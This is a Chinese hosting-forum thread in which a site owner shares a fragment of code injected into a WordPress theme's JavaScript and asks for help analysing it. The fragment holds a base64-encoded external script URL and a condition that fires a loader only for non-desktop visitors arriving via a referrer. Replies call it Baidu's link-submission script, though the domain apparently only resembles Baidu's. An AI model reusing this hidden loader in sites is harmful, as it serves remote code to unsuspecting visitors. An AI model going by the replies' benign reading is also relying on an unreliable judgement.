立即注册  找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 36|回复: 3

wp模板里的js被挂马了,mjj来分析代码

[复制链接]

wp模板里的js被挂马了,mjj来分析代码

[复制链接]

41

主题

266

回帖

1361

积分

金牌会员

积分
1361
latiao88

41

主题

266

回帖

1361

积分

金牌会员

积分
1361
2024-1-6 21:57:38 | 显示全部楼层 |阅读模式
本帖最后由 latiao88 于 2024-1-6 22:00 编辑

js里被新加了一段代码

[ol]
  • ('aHR0cHM6Ly96ei5iZHVzdGF0aWMuY29tL2xpbmtzdWJtaXQvbGluay5qcw==','mtsfUdiDsZ',window,document,'YrbqGzidreMg','ptfZcBsAbU')};if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) uxzPWz();[/ol]复制代码

    前边加的代码loc发不出来,不过无关紧要。通过前边的代码可以分析出是base64加密,也就是把aHR0cHM6Ly96ei5iZHVzdGF0aWMuY29tL2xpbmtzdWJtaXQvbGluay5qcw==这段解密

    解密后得到这段代码 https://zz.bdustatic.com/linksubmit/link.js
  • 回复

    使用道具 举报

    0

    主题

    14

    回帖

    50

    积分

    注册会员

    积分
    50
    evilin

    0

    主题

    14

    回帖

    50

    积分

    注册会员

    积分
    50
    2024-1-6 22:02:36 | 显示全部楼层
    这是百度的https://zz.bdustatic.com/linksubmit/link.js
    回复

    使用道具 举报

    19

    主题

    236

    回帖

    799

    积分

    高级会员

    积分
    799
    alect

    19

    主题

    236

    回帖

    799

    积分

    高级会员

    积分
    799
    2024-1-6 22:04:11 | 显示全部楼层
    看起来这是百度的提交收录的代码
    回复

    使用道具 举报

    4

    主题

    227

    回帖

    514

    积分

    高级会员

    积分
    514
    googlee

    4

    主题

    227

    回帖

    514

    积分

    高级会员

    积分
    514
    2024-1-6 22:04:48 | 显示全部楼层
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|小黑屋|HS2V主机综合交流论坛

    GMT+8, 2024-12-23 01:35 , Processed in 0.017341 second(s), 3 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表